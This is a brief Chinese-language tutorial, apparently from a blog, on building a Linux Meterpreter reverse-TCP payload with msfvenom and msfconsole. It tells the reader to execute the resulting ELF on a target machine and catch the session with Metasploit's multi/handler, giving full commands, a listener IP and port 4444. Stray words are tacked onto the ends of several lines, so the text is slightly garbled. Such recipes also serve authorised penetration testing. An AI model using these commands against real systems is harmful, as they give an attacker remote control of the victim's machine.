一、CLI下生成payloadlinux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elfshell
二、msfconsole下生成payloadtcp
use payload/linux/x86/meterpreter/reverse_tcp 並設置optionspa
generate -h 有豐富的選項code
generate -f elf -o /shell.elf 根據須要添加選項 -o輸出文件到指定目錄blog
三、在靶機上執行該文件,並在msf下監聽it
在靶機上給文件賦值,並執行該文件io
在msf監聽端口console
msf > use exploit/multi/handler msf > set payload linux/x86/meterpreter/reverse_tcp msf > set LHOST 10.180.7.20 msf > run